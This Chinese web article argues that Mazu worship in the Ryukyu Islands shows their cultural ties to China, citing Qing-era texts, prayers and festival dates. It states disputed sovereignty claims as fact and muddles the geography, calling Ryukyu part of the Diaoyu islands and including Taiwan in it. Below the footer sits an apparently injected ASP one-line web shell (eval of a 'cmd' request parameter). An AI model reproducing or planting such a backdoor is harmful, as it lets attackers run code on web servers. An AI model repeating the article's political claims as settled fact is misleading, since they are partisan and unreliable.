保钓理论

妈祖信仰是琉球主流信奉之一

时间:2016-4-4 12:35:16  作者:李景科  来源:  查看:148  评论:0
内容摘要:琉球在广义上泛指中国台湾,琉球群岛,琉球王国等,与中华华夏民族无论在人种进化学,文化传统和历史渊源均有直源的历史关系。琉球位于中国东南端,日本列岛最南端。琉球群岛由琉球、宫古、八重山三个群岛为中心的六十多个岛屿组成,面积2265平方公里,是太平洋的一系列岛屿钓鱼群岛。现在琉球处于...
琉球在广义上泛指中国台湾,琉球群岛,琉球王国等,与中华华夏民族无论在人种进化学,文化传统和历史渊源均有直源的历史关系。琉球位于中国东南端,日本列岛最南端。琉球群岛由琉球、宫古、八重山三个群岛为中心的六十多个岛屿组成,面积2265平方公里,是太平洋的一系列岛屿钓鱼群岛。现在琉球处于日本实际控制之下,但在法理上主权不属于日本。

琉球四面环海,妈祖文化是琉球人信奉的主要文化之一,而妈祖文化又起源于距离琉球最近的中国东南沿海地区,是汉族民间信仰。妈祖文化肇于宋、成于元、兴于明、盛于清、繁荣于近现代,妈祖文化体现了汉族海洋文化的一种特质。有一句话叫 “有海水处有华人,华人到处有妈祖”,因此,妈祖文化作为汉族民间信仰崇拜神之一,能够在琉球存在,就证明琉球与中国汉族具有文化信仰同源的特征。

关于琉球的妈祖庙宇,在很多涉及琉球的志书中均有介绍。《指南广义》收录不少有关妈祖信仰的史料,成为妈祖信仰传播琉球的见证。而且《指南广义·目录》中有关妈祖的完整篇目就有:《天妃灵应纪略》、《请天妃安享祝文》、《请天妃登舟祝文》、《请天妃入庙祝文》、《天妃诞辰及节序祝文》、《祭天妃仪注》以及附录中的《重建天妃楼记》等,共30多页。《天妃灵应纪略》中特别记载了许多琉球册封使在海上得天妃神助的故事。如嘉靖十三年册封使陈侃、高澄在古米山发漏和遭遇飓风得救,万历七年萧崇业、谢杰迷航得引导,万历三十四年夏子阳、王士祯封舟遭遇巨浪失舵化险。还有清汪楫、林麟火昌得止风获全等天妃神验传说。《请天妃安享祝文》记载:“琉球国中山王府官等敢昭告于敕封护国庇民妙灵昭应弘仁普济天妃曰:神秉正气,得坤之贞。湄洲诞降,山川钟灵。泽及红海,舟楫无惊。历膺封典,福国佑民。兹当贡,将次至闽。请享安位,十日启行。陈词荐酒,来格来歆。上飨!”文末注云:“凡祝文,用纸书粘于祝版上,临祭,置于酒注桌上,读毕,置于案上香炉左,祭毕,揭而焚之。”,在清朝,琉球祭妈祖节日共有七个,分别是:正月初四,迎神朝天返回;三月初三上巳节;三月廿三妈祖诞辰;五月初五端午节;九月初九重阳节;冬至节和腊月廿四送神上天。因此,琉球祭祀和迎送安置妈祖神像是十分庄重的。比大陆要隆重和正规的多。

笔者收藏的一些古籍,如《琉球国志略》,就记载了宋元两朝天妃封号的历史概略。琉球国最初有三处天妃宫(妈祖庙),最早有宋朝宣和年的匾额,次有崇祯六年立的匾额,顺治六年的碑记和康熙二年的匾额。在有关志书中妈祖(天妃)的记载是必不可少的内容部分原著原件照片如下,以飨读者。

妈祖信仰是琉球主流信奉之一
世保盟微信公衆号

微信掃一掃二維碼

相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):